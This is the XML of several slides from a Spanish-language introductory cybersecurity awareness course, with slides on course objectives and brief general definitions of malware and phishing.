              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10AD4AD-F3AF-D72A-A3E9-8E4BAD17CBBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417505" y="4529208"/>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9" name="Rectángulo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5853D06-B479-2E51-8E34-30770924F942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629346" y="3766724"/>
            <a:ext cx="4373124" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Genera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>confianza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> en sus clientes, proveedores y en el mercado en general.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD7114CF-E092-35D4-4802-68D13BC15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93" y="3147695"/>
            <a:ext cx="609524" cy="609524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imagen 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24E8E0A9-3E44-91FD-E166-8609727179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8037" y="4809740"/>
            <a:ext cx="543836" cy="543836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 12" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62078C06-1519-B938-8CD7-7F519DBB9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110" y="1558953"/>
            <a:ext cx="595689" cy="595689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectángulo 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68957F4-7C9A-7CAC-2681-B349CFE59648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629346" y="1513504"/>
            <a:ext cx="9737666" cy="1754326"/>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La ciberseguridad es una práctica cada vez más </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>necesaria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>en un mundo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cada vez más digitalizado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectángulo 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E78D2B52-59F6-F263-36EF-545D2A3BA43D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629346" y="2417707"/>
            <a:ext cx="6485034" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La ciberseguridad sirve para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>prevenir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ataques informáticos, detectar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vulnerabilidades y fisuras de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C037DBC-6A22-D4DD-BBD9-C95CB9BF845F}"/>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6485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A99AE-39BA-30C9-7827-0B49A2302DD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101F0AD-52C2-EB49-9757-6E4C13AA7CAD}"/>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252837C6-66DC-0ABD-AC02-342FEE7D2D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="9500616"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rgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objetivos del curso</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7567CD11-9408-1EBB-6FF2-1D435D629363}"/>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3" name="Diagrama 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78417B16-FAF8-04DD-ACB7-647464BCD929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4118814160"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="786189" y="1254034"/>
          <a:ext cx="9916645" cy="455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Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C695CA4D-9495-1E90-3ABA-4E227E7F2395}"/>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719181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8A706-7EDC-D88E-3060-C2291F6C428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3A3E717-C6D5-5D8B-B642-455A0DBEE6EE}"/>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EB05384-7E0B-B55A-207D-C2C688D8901D}"/>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Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{115B81F8-045B-ADDC-8CE8-A61104E7B81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113F7EEF-DE86-03D4-C535-910FAB022186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930453" y="1727199"/>
            <a:ext cx="9737666" cy="646331"/>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Es el tipo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ataque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>más común</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C838942D-7D59-3930-0F90-B6D08D6B14C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5050136" y="2001246"/>
            <a:ext cx="5513896" cy="3092933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F48CCCBE-7FA1-8162-7F29-7564EB2A5F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571035" y="1436293"/>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7" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCC5FAE-E159-07FC-58D5-6087841C5F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571035" y="3120287"/>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9" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBA5ACFB-86A7-764B-8746-2F1F669B3864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571035" y="4804280"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A3EEF6D-B2DB-5E79-8B22-FBF99C8C87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077" y="5119722"/>
            <a:ext cx="543836" cy="543836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectángulo 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF45C742-B6AE-3B3F-3A80-7C300DCEB4E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930453" y="3262184"/>
            <a:ext cx="9737666" cy="923330"/>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Suele provenir de algún </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>archivo adjunto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>que se </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>descarga. </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectángulo 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BF6D8E-47F7-6C98-5688-74E8DD79F24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793818" y="4940485"/>
            <a:ext cx="9737666" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Permite al atacante </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>acceder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>a redes y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dañar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bloquear o robar información </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>del equipo de un usuario.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Imagen 26" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{895E7910-2BB4-96DF-373E-EE3E7242EB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366" y="3367937"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Imagen 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB89C00-3E6B-858B-BA41-A912FCEF3F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116" y="1630590"/>
            <a:ext cx="800100" cy="800100"/>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EC3E2530-B370-DDC5-DBCD-5A9B324E3EDB}"/>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295704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5B5A0-84E1-C4A2-6EBF-184BEBFF380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88CD3A7-27AE-A0E3-63CE-2B0DFC9AD9FA}"/>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86647D3-24F9-F9E6-F732-49F5A8833ED3}"/>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Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162A8701-EDCB-4379-52CF-D1873C38325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Rectángulo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{728AEA7C-6D23-C4F4-407B-9DD7A7E0284D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550673" y="1537025"/>
            <a:ext cx="10077069" cy="923330"/>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Crear copias de página web o enviar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>correos solicitando datos confidenciales como tarjetas de crédito o contraseñas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, haciéndolo parecer que proviene de fuentes confiables como empresas o bancos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Imagen que contiene Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E90219C-A6FB-5663-1DDB-93B65CD072EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3140015" y="2648018"/>
            <a:ext cx="5760090" cy="3237255"/>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F61F061B-A975-888D-AF45-9CD1422D4C2C}"/>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16863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9B9B-1CBB-59BA-101F-E70635847E10}"/>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9CD73CA-1CC4-71BB-0792-C262A977D204}"/>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FACF0C3-D288-E12D-EA63-B34EB958AB4C}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
